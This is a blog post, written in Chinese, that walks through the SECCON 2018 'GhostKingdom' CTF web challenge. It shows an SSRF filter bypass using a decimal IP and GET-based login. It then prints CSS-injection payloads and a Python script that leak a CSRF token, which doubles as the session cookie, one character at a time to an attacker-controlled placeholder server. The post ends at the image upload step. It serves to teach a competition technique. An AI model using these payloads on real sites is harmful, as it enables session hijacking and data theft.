<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 4.2.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/font-awesome.min.css">
  <link rel="stylesheet" href="//cdn.jsdelivr.net/gh/fancyapps/fancybox@3/dist/jquery.fancybox.min.css">
  <link rel="stylesheet" href="/lib/pace/pace-theme-minimal.min.css">
  <script src="/lib/pace/pace.min.js"></script>

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"srpopty.github.io","root":"/","scheme":"Muse","version":"7.7.2","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":true,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="这次参加了Seccon2018，鄙人有幸做出了一道题，感觉其中利用css获取数据的方法非常好。">
<meta property="og:type" content="article">
<meta property="og:title" content="Seccon2018 GhostKingdom Writeup">
<meta property="og:url" content="https://srpopty.github.io/2018/10/28/Seccon2018-GhostKingdom-Writeup/index.html">
<meta property="og:site_name" content="Shadow Gallery">
<meta property="og:description" content="这次参加了Seccon2018，鄙人有幸做出了一道题，感觉其中利用css获取数据的方法非常好。">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://srpopty.github.io/2018/10/28/Seccon2018-GhostKingdom-Writeup/TIM%E6%88%AA%E5%9B%BE20181027231049.png">
<meta property="og:image" content="https://srpopty.github.io/2018/10/28/Seccon2018-GhostKingdom-Writeup/TIM%E6%88%AA%E5%9B%BE20181027231307.png">
<meta property="og:image" content="https://srpopty.github.io/2018/10/28/Seccon2018-GhostKingdom-Writeup/TIM%E6%88%AA%E5%9B%BE20181027232032.png">
<meta property="og:image" content="https://srpopty.github.io/2018/10/28/Seccon2018-GhostKingdom-Writeup/IYF7PP3R055_66RTM9M3CX.png">
<meta property="og:image" content="https://srpopty.github.io/2018/10/28/Seccon2018-GhostKingdom-Writeup/SUGQFXO7YMRUAG9LHT.png">
<meta property="og:image" content="https://srpopty.github.io/2018/10/28/Seccon2018-GhostKingdom-Writeup/TIM%E6%88%AA%E5%9B%BE20181027233019.png">
<meta property="og:image" content="https://srpopty.github.io/2018/10/28/Seccon2018-GhostKingdom-Writeup/TIM%E6%88%AA%E5%9B%BE20181027233045.png">
<meta property="og:image" content="https://srpopty.github.io/2018/10/28/Seccon2018-GhostKingdom-Writeup/TIM%E6%88%AA%E5%9B%BE20181027233507.png">
<meta property="og:image" content="https://srpopty.github.io/2018/10/28/Seccon2018-GhostKingdom-Writeup/TIM%E6%88%AA%E5%9B%BE20181027225501.png">
<meta property="og:image" content="https://srpopty.github.io/2018/10/28/Seccon2018-GhostKingdom-Writeup/TIM%E6%88%AA%E5%9B%BE20181027225514.png">
<meta property="og:image" content="https://srpopty.github.io/2018/10/28/Seccon2018-GhostKingdom-Writeup/TIM%E6%88%AA%E5%9B%BE20181027234138.png">
<meta property="article:published_time" content="2018-10-28T07:23:58.000Z">
<meta property="article:modified_time" content="2020-03-11T13:06:04.801Z">
<meta property="article:author" content="Srpopty">
<meta property="article:tag" content="writeup">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://srpopty.github.io/2018/10/28/Seccon2018-GhostKingdom-Writeup/TIM%E6%88%AA%E5%9B%BE20181027231049.png">

<link rel="canonical" href="https://srpopty.github.io/2018/10/28/Seccon2018-GhostKingdom-Writeup/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true
  };
</script>

  <title>Seccon2018 GhostKingdom Writeup | Shadow Gallery</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

<link rel="alternate" href="/atom.xml" title="Shadow Gallery" type="application/atom+xml">
</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <div>
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Shadow Gallery</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
        <p class="site-subtitle">Live in the shadow</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>


<nav class="site-nav">
  
  <ul id="menu" class="menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-fw fa-home"></i>Home</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-fw fa-tags"></i>Tags</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-fw fa-th"></i>Categories</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-fw fa-archive"></i>Archives</a>

  </li>
  </ul>

</nav>
</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>
  <div class="reading-progress-bar"></div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content">
            

  <div class="posts-expand">
      
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block " lang="en">
    <link itemprop="mainEntityOfPage" href="https://srpopty.github.io/2018/10/28/Seccon2018-GhostKingdom-Writeup/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="Srpopty">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Shadow Gallery">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          Seccon2018 GhostKingdom Writeup
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              <span class="post-meta-item-text">Posted on</span>

              <time title="Created: 2018-10-28 15:23:58" itemprop="dateCreated datePublished" datetime="2018-10-28T15:23:58+08:00">2018-10-28</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="fa fa-calendar-check-o"></i>
                </span>
                <span class="post-meta-item-text">Edited on</span>
                <time title="Modified: 2020-03-11 21:06:04" itemprop="dateModified" datetime="2020-03-11T21:06:04+08:00">2020-03-11</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              <span class="post-meta-item-text">In</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/ctf/" itemprop="url" rel="index"><span itemprop="name">ctf</span></a>
                </span>
            </span>

          
            <div class="post-description">这次参加了Seccon2018，鄙人有幸做出了一道题，感觉其中利用css获取数据的方法非常好。</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h1 id="GhostKindom"><a href="#GhostKindom" class="headerlink" title="GhostKindom"></a>GhostKindom</h1><p>网站最开始登陆以后只有两个功能，给admin发送消息以及对指定url地址的网页截屏，第三个upload image功能需要在本地登录后才知道url地址</p>
<p>首先尝试截屏功能有没有ssrf，发现127.0.0.1这类的地址被过滤了<br><img src="/2018/10/28/Seccon2018-GhostKingdom-Writeup/TIM%E6%88%AA%E5%9B%BE20181027231049.png" alt></p>
<p>于是更改127.0.0.1的格式为2130706433，原理是将点分十进制的ip地址转换为十进制的ip地址，它们本质上是一样的</p>
<p>发现可以访问127.0.0.1的网址，但是需要登录<br><img src="/2018/10/28/Seccon2018-GhostKingdom-Writeup/TIM%E6%88%AA%E5%9B%BE20181027231307.png" alt></p>
<p>但是这个网站在登录与注册时，所提交的用户名和密码都是用get方式的，所以可以用get登录，在截屏的目标url中填入<br><code>http://2130706433/?user=username&amp;pass=password&amp;action=login</code><br>即可登录成功，服务器会自动记录session，所以只需登录一次，下次截屏时就能访问其他的网页了</p>
<p>可以看到通过截屏可以访问upload image，但是却不知道upload image的url地址，所以现在的目标就是获取upload image的地址<br><img src="/2018/10/28/Seccon2018-GhostKingdom-Writeup/TIM%E6%88%AA%E5%9B%BE20181027232032.png" alt></p>
<p>这个网站还有另一个功能，可以给admin留言，但是经过测试发现并没有留言功能，但是在留言之前可以预览自己的留言，而这里可以进行css的注入<br><img src="/2018/10/28/Seccon2018-GhostKingdom-Writeup/IYF7PP3R055_66RTM9M3CX.png" alt></p>
<p>“c3BhbntiYWNrZ3JvdW5kLWNvbG9yOnJlZDtjb2xvcjp5ZWxsb3d9”经过base64解码后就是”span{background-color:red;color:yellow}”，所以这里的css是可以控制的</p>
<p>注意到一个csrf参数，可以看到csrf的值就是cookie的值<br><img src="/2018/10/28/Seccon2018-GhostKingdom-Writeup/SUGQFXO7YMRUAG9LHT.png" alt></p>
<p>所以这里可以利用css来获取源码中的csrf值，也就是cookie，于是思路如下：<br>先利用截屏功能的ssrf登录，使服务器端获取到一个cookie，之后在截屏的ssrf中的预览留言的界面用css获取到csrf的值，拿到在127.0.0.1登录的账号的cookie，劫持以后就可以获取upload image的url了</p>
<p>在预览界面的html如下：</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;!DOCTYPE <span class="meta-keyword">html</span></span></span><br><span class="line"><span class="meta">	<span class="meta-keyword">PUBLIC</span> <span class="meta-string">"-//W3C//DTD XHTML 1.0 Transitional//EN"</span></span></span><br><span class="line"><span class="meta">	 <span class="meta-string">"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">html</span> <span class="attr">xmlns</span>=<span class="string">"http://www.w3.org/1999/xhtml"</span> <span class="attr">lang</span>=<span class="string">"ja"</span> <span class="attr">xml:lang</span>=<span class="string">"ja"</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">head</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">title</span>&gt;</span>SECCON 2018<span class="tag">&lt;/<span class="name">title</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">meta</span> <span class="attr">http-equiv</span>=<span class="string">"Content-Type"</span> <span class="attr">content</span>=<span class="string">"text/html; charset=UTF-8"</span> /&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">head</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">body</span> <span class="attr">bgcolor</span>=<span class="string">"black"</span>&gt;</span></span><br><span class="line"><span class="comment">&lt;!-- by KeigoYAMAZAKI, 2018.08.31- --&gt;</span><span class="tag">&lt;<span class="name">style</span>&gt;</span><span class="css"><span class="selector-tag">h2</span>&#123;<span class="attribute">border</span>:double <span class="number">#668ad8</span>;<span class="attribute">border-width</span>:<span class="number">6px</span> <span class="number">0</span> <span class="number">6px</span> <span class="number">0</span>;<span class="attribute">padding</span>:<span class="number">10px</span>;<span class="attribute">color</span>:<span class="number">#668ad8</span>&#125; <span class="selector-class">.main</span>&#123;<span class="attribute">background-color</span>:<span class="number">#e1e1e1</span>;<span class="attribute">color</span>:black;<span class="attribute">width</span>:<span class="number">85%</span>;<span class="attribute">padding</span>:<span class="number">60px</span>;<span class="attribute">margin</span>:<span class="number">40px</span> auto;<span class="attribute">border</span>:<span class="number">2px</span> solid <span class="number">#C6B665</span>&#125;<span class="selector-class">.msg</span>&#123;<span class="attribute">padding</span>:<span class="number">15px</span>;<span class="attribute">border</span>:<span class="number">1px</span> solid black&#125; <span class="selector-class">.ok</span>&#123;<span class="attribute">color</span>:blue&#125; <span class="selector-class">.warn</span>&#123;<span class="attribute">color</span>:orange&#125; <span class="selector-class">.err</span>&#123;<span class="attribute">color</span>:red&#125; <span class="selector-class">.green</span>&#123;<span class="attribute">background-color</span>:lightgreen&#125; <span class="selector-class">.btn</span>&#123;<span class="attribute">background</span>:<span class="number">#668ad8</span>;<span class="attribute">color</span>:white;<span class="attribute">padding</span>:<span class="number">0.5em</span>;<span class="attribute">margin</span>:<span class="number">10px</span>&#125; <span class="selector-class">.sshot</span>&#123;<span class="attribute">border</span>:<span class="number">2px</span> solid white&#125;</span><span class="tag">&lt;/<span class="name">style</span>&gt;</span><span class="tag">&lt;<span class="name">img</span> <span class="attr">src</span>=<span class="string">"seccon2018_logo.png"</span>&gt;</span><span class="tag">&lt;<span class="name">div</span> <span class="attr">class</span>=<span class="string">"main"</span>&gt;</span><span class="tag">&lt;<span class="name">form</span> <span class="attr">action</span>=<span class="string">"?"</span> <span class="attr">method</span>=<span class="string">"get"</span>&gt;</span><span class="tag">&lt;<span class="name">style</span>&gt;</span><span class="css"><span class="selector-tag">span</span>&#123;<span class="attribute">background-color</span>:red;<span class="attribute">color</span>:yellow&#125;</span><span class="tag">&lt;/<span class="name">style</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">span</span> <span class="attr">class</span>=<span class="string">"msg"</span>&gt;</span>Message: 1<span class="tag">&lt;/<span class="name">span</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">"hidden"</span> <span class="attr">name</span>=<span class="string">"csrf"</span> <span class="attr">value</span>=<span class="string">"da2b6930fb2a34afefb268"</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">"hidden"</span> <span class="attr">name</span>=<span class="string">"action"</span> <span class="attr">value</span>=<span class="string">"msgadm3"</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">"submit"</span> <span class="attr">class</span>=<span class="string">"btn"</span> <span class="attr">value</span>=<span class="string">"Send to admin"</span>&gt;</span></span><br></pre></td></tr></table></figure>

<p>关于使用css获取数据，payload如下:</p>
<figure class="highlight css"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="selector-tag">input</span><span class="selector-attr">[value^=<span class="string">"a"</span>]</span>&#123;<span class="attribute">background</span>:<span class="built_in">url</span>(<span class="string">"http://xxxxxxx.xx/xss/?match=a"</span>)&#125;</span><br><span class="line"><span class="selector-tag">input</span><span class="selector-attr">[value^=<span class="string">"b"</span>]</span>&#123;<span class="attribute">background</span>:<span class="built_in">url</span>(<span class="string">"http://xxxxxxx.xx/xss/?match=b"</span>)&#125;</span><br><span class="line"><span class="selector-tag">input</span><span class="selector-attr">[value^=<span class="string">"c"</span>]</span>&#123;<span class="attribute">background</span>:<span class="built_in">url</span>(<span class="string">"http://xxxxxxx.xx/xss/?match=c"</span>)&#125;</span><br><span class="line"><span class="selector-tag">input</span><span class="selector-attr">[value^=<span class="string">"d"</span>]</span>&#123;<span class="attribute">background</span>:<span class="built_in">url</span>(<span class="string">"http://xxxxxxx.xx/xss/?match=d"</span>)&#125;</span><br><span class="line"><span class="selector-tag">input</span><span class="selector-attr">[value^=<span class="string">"e"</span>]</span>&#123;<span class="attribute">background</span>:<span class="built_in">url</span>(<span class="string">"http://xxxxxxx.xx/xss/?match=e"</span>)&#125;</span><br><span class="line"><span class="selector-tag">input</span><span class="selector-attr">[value^=<span class="string">"f"</span>]</span>&#123;<span class="attribute">background</span>:<span class="built_in">url</span>(<span class="string">"http://xxxxxxx.xx/xss/?match=f"</span>)&#125;</span><br><span class="line"><span class="selector-tag">input</span><span class="selector-attr">[value^=<span class="string">"0"</span>]</span>&#123;<span class="attribute">background</span>:<span class="built_in">url</span>(<span class="string">"http://xxxxxxx.xx/xss/?match=0"</span>)&#125;</span><br><span class="line"><span class="selector-tag">input</span><span class="selector-attr">[value^=<span class="string">"1"</span>]</span>&#123;<span class="attribute">background</span>:<span class="built_in">url</span>(<span class="string">"http://xxxxxxx.xx/xss/?match=1"</span>)&#125;</span><br><span class="line"><span class="selector-tag">input</span><span class="selector-attr">[value^=<span class="string">"2"</span>]</span>&#123;<span class="attribute">background</span>:<span class="built_in">url</span>(<span class="string">"http://xxxxxxx.xx/xss/?match=2"</span>)&#125;</span><br><span class="line"><span class="selector-tag">input</span><span class="selector-attr">[value^=<span class="string">"3"</span>]</span>&#123;<span class="attribute">background</span>:<span class="built_in">url</span>(<span class="string">"http://xxxxxxx.xx/xss/?match=3"</span>)&#125;</span><br><span class="line"><span class="selector-tag">input</span><span class="selector-attr">[value^=<span class="string">"4"</span>]</span>&#123;<span class="attribute">background</span>:<span class="built_in">url</span>(<span class="string">"http://xxxxxxx.xx/xss/?match=4"</span>)&#125;</span><br><span class="line"><span class="selector-tag">input</span><span class="selector-attr">[value^=<span class="string">"5"</span>]</span>&#123;<span class="attribute">background</span>:<span class="built_in">url</span>(<span class="string">"http://xxxxxxx.xx/xss/?match=5"</span>)&#125;</span><br><span class="line"><span class="selector-tag">input</span><span class="selector-attr">[value^=<span class="string">"6"</span>]</span>&#123;<span class="attribute">background</span>:<span class="built_in">url</span>(<span class="string">"http://xxxxxxx.xx/xss/?match=6"</span>)&#125;</span><br><span class="line"><span class="selector-tag">input</span><span class="selector-attr">[value^=<span class="string">"7"</span>]</span>&#123;<span class="attribute">background</span>:<span class="built_in">url</span>(<span class="string">"http://xxxxxxx.xx/xss/?match=7"</span>)&#125;</span><br><span class="line"><span class="selector-tag">input</span><span class="selector-attr">[value^=<span class="string">"8"</span>]</span>&#123;<span class="attribute">background</span>:<span class="built_in">url</span>(<span class="string">"http://xxxxxxx.xx/xss/?match=8"</span>)&#125;</span><br><span class="line"><span class="selector-tag">input</span><span class="selector-attr">[value^=<span class="string">"9"</span>]</span>&#123;<span class="attribute">background</span>:<span class="built_in">url</span>(<span class="string">"http://xxxxxxx.xx/xss/?match=9"</span>)&#125;</span><br></pre></td></tr></table></figure>


<p>原理是利用css选择器，当css解释器对每一个选择器进行解释时，如果找到了input的属性value的值符合其中的一个的话，就会向鄙人的xss服务器发送一次请求，这样就能确定每一位的value，最后可以获得整个csrf的值，比如第一次在xss服务器上获得的请求时match=b，则第二次的payload为</p>
<figure class="highlight css"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="selector-tag">input</span><span class="selector-attr">[value^=<span class="string">"ba"</span>]</span>&#123;<span class="attribute">background</span>:<span class="built_in">url</span>(<span class="string">"http://xxxxxxx.xx/xss/?match=ba"</span>)&#125;</span><br><span class="line"><span class="selector-tag">input</span><span class="selector-attr">[value^=<span class="string">"bb"</span>]</span>&#123;<span class="attribute">background</span>:<span class="built_in">url</span>(<span class="string">"http://xxxxxxx.xx/xss/?match=bb"</span>)&#125;</span><br><span class="line"><span class="selector-tag">input</span><span class="selector-attr">[value^=<span class="string">"bc"</span>]</span>&#123;<span class="attribute">background</span>:<span class="built_in">url</span>(<span class="string">"http://xxxxxxx.xx/xss/?match=bc"</span>)&#125;</span><br><span class="line"><span class="selector-tag">input</span><span class="selector-attr">[value^=<span class="string">"bd"</span>]</span>&#123;<span class="attribute">background</span>:<span class="built_in">url</span>(<span class="string">"http://xxxxxxx.xx/xss/?match=bd"</span>)&#125;</span><br><span class="line"><span class="selector-tag">input</span><span class="selector-attr">[value^=<span class="string">"be"</span>]</span>&#123;<span class="attribute">background</span>:<span class="built_in">url</span>(<span class="string">"http://xxxxxxx.xx/xss/?match=be"</span>)&#125;</span><br><span class="line"><span class="selector-tag">input</span><span class="selector-attr">[value^=<span class="string">"bf"</span>]</span>&#123;<span class="attribute">background</span>:<span class="built_in">url</span>(<span class="string">"http://xxxxxxx.xx/xss/?match=bf"</span>)&#125;</span><br><span class="line"><span class="selector-tag">input</span><span class="selector-attr">[value^=<span class="string">"b0"</span>]</span>&#123;<span class="attribute">background</span>:<span class="built_in">url</span>(<span class="string">"http://xxxxxxx.xx/xss/?match=b0"</span>)&#125;</span><br><span class="line"><span class="selector-tag">input</span><span class="selector-attr">[value^=<span class="string">"b1"</span>]</span>&#123;<span class="attribute">background</span>:<span class="built_in">url</span>(<span class="string">"http://xxxxxxx.xx/xss/?match=b1"</span>)&#125;</span><br><span class="line"><span class="selector-tag">input</span><span class="selector-attr">[value^=<span class="string">"b2"</span>]</span>&#123;<span class="attribute">background</span>:<span class="built_in">url</span>(<span class="string">"http://xxxxxxx.xx/xss/?match=b2"</span>)&#125;</span><br><span class="line"><span class="selector-tag">input</span><span class="selector-attr">[value^=<span class="string">"b3"</span>]</span>&#123;<span class="attribute">background</span>:<span class="built_in">url</span>(<span class="string">"http://xxxxxxx.xx/xss/?match=b3"</span>)&#125;</span><br><span class="line"><span class="selector-tag">input</span><span class="selector-attr">[value^=<span class="string">"b4"</span>]</span>&#123;<span class="attribute">background</span>:<span class="built_in">url</span>(<span class="string">"http://xxxxxxx.xx/xss/?match=b4"</span>)&#125;</span><br><span class="line"><span class="selector-tag">input</span><span class="selector-attr">[value^=<span class="string">"b5"</span>]</span>&#123;<span class="attribute">background</span>:<span class="built_in">url</span>(<span class="string">"http://xxxxxxx.xx/xss/?match=b5"</span>)&#125;</span><br><span class="line"><span class="selector-tag">input</span><span class="selector-attr">[value^=<span class="string">"b6"</span>]</span>&#123;<span class="attribute">background</span>:<span class="built_in">url</span>(<span class="string">"http://xxxxxxx.xx/xss/?match=b6"</span>)&#125;</span><br><span class="line"><span class="selector-tag">input</span><span class="selector-attr">[value^=<span class="string">"b7"</span>]</span>&#123;<span class="attribute">background</span>:<span class="built_in">url</span>(<span class="string">"http://xxxxxxx.xx/xss/?match=b7"</span>)&#125;</span><br><span class="line"><span class="selector-tag">input</span><span class="selector-attr">[value^=<span class="string">"b8"</span>]</span>&#123;<span class="attribute">background</span>:<span class="built_in">url</span>(<span class="string">"http://xxxxxxx.xx/xss/?match=b8"</span>)&#125;</span><br><span class="line"><span class="selector-tag">input</span><span class="selector-attr">[value^=<span class="string">"b9"</span>]</span>&#123;<span class="attribute">background</span>:<span class="built_in">url</span>(<span class="string">"http://xxxxxxx.xx/xss/?match=b9"</span>)&#125;</span><br></pre></td></tr></table></figure>

<p>以此类推最后拿到整个cookie<br><img src="/2018/10/28/Seccon2018-GhostKingdom-Writeup/TIM%E6%88%AA%E5%9B%BE20181027233019.png" alt><br><img src="/2018/10/28/Seccon2018-GhostKingdom-Writeup/TIM%E6%88%AA%E5%9B%BE20181027233045.png" alt></p>
<blockquote>
<p>这里有一个细节需要解释一下：这里最后拿到的cookie和之前截图中的cookie是一样的，是因为最前面截的图是题目已经做完了以后截图，当时已经劫持了获取到的cookie，但是在做题的时候cookie是不一样的，</p>
</blockquote>
<p>脚本如下(每次需要输入上次获取到的字符)</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> base64</span><br><span class="line"></span><br><span class="line">url = <span class="string">'http://2130706433/?css=%s&amp;msg=&amp;action=msgadm2'</span></span><br><span class="line"></span><br><span class="line">payload = <span class="string">'''input[value^="%sa"]&#123;background:url("http://xxxxxxx.xx/xss/?match=%sa")&#125;</span></span><br><span class="line"><span class="string">input[value^="%sb"]&#123;background:url("http://xxxxxxx.xx/xss/?match=%sb")&#125;</span></span><br><span class="line"><span class="string">input[value^="%sc"]&#123;background:url("http://xxxxxxx.xx/xss/?match=%sc")&#125;</span></span><br><span class="line"><span class="string">input[value^="%sd"]&#123;background:url("http://xxxxxxx.xx/xss/?match=%sd")&#125;</span></span><br><span class="line"><span class="string">input[value^="%se"]&#123;background:url("http://xxxxxxx.xx/xss/?match=%se")&#125;</span></span><br><span class="line"><span class="string">input[value^="%sf"]&#123;background:url("http://xxxxxxx.xx/xss/?match=%sf")&#125;</span></span><br><span class="line"><span class="string">input[value^="%s0"]&#123;background:url("http://xxxxxxx.xx/xss/?match=%s0")&#125;</span></span><br><span class="line"><span class="string">input[value^="%s1"]&#123;background:url("http://xxxxxxx.xx/xss/?match=%s1")&#125;</span></span><br><span class="line"><span class="string">input[value^="%s2"]&#123;background:url("http://xxxxxxx.xx/xss/?match=%s2")&#125;</span></span><br><span class="line"><span class="string">input[value^="%s3"]&#123;background:url("http://xxxxxxx.xx/xss/?match=%s3")&#125;</span></span><br><span class="line"><span class="string">input[value^="%s4"]&#123;background:url("http://xxxxxxx.xx/xss/?match=%s4")&#125;</span></span><br><span class="line"><span class="string">input[value^="%s5"]&#123;background:url("http://xxxxxxx.xx/xss/?match=%s5")&#125;</span></span><br><span class="line"><span class="string">input[value^="%s6"]&#123;background:url("http://xxxxxxx.xx/xss/?match=%s6")&#125;</span></span><br><span class="line"><span class="string">input[value^="%s7"]&#123;background:url("http://xxxxxxx.xx/xss/?match=%s7")&#125;</span></span><br><span class="line"><span class="string">input[value^="%s8"]&#123;background:url("http://xxxxxxx.xx/xss/?match=%s8")&#125;</span></span><br><span class="line"><span class="string">input[value^="%s9"]&#123;background:url("http://xxxxxxx.xx/xss/?match=%s9")&#125;</span></span><br><span class="line"><span class="string">'''</span></span><br><span class="line"></span><br><span class="line">result = <span class="string">'da'</span></span><br><span class="line"><span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">    p = payload % (</span><br><span class="line">        result, result, result, result,</span><br><span class="line">        result, result, result, result,</span><br><span class="line">        result, result, result, result,</span><br><span class="line">        result, result, result, result,</span><br><span class="line">        result, result, result, result,</span><br><span class="line">        result, result, result, result,</span><br><span class="line">        result, result, result, result,</span><br><span class="line">        result, result, result, result</span><br><span class="line">    )</span><br><span class="line">    <span class="keyword">print</span> p</span><br><span class="line">    u = url % base64.b64encode(p)</span><br><span class="line">    <span class="keyword">print</span> u</span><br><span class="line"></span><br><span class="line">    result += raw_input(<span class="string">'[*] Char: '</span>)</span><br></pre></td></tr></table></figure>

<p>在获取到cookie之后进行劫持，就可以在本机看到upload image的地址了<br><img src="/2018/10/28/Seccon2018-GhostKingdom-Writeup/TIM%E6%88%AA%E5%9B%BE20181027233507.png" alt></p>
<p>在upload界面，首先需要上传一个jpg图片，之后会把jpg图片转换为gif图片，上传的jpg图片的文件名以及后缀都不可控，只有图片内容可控</p>
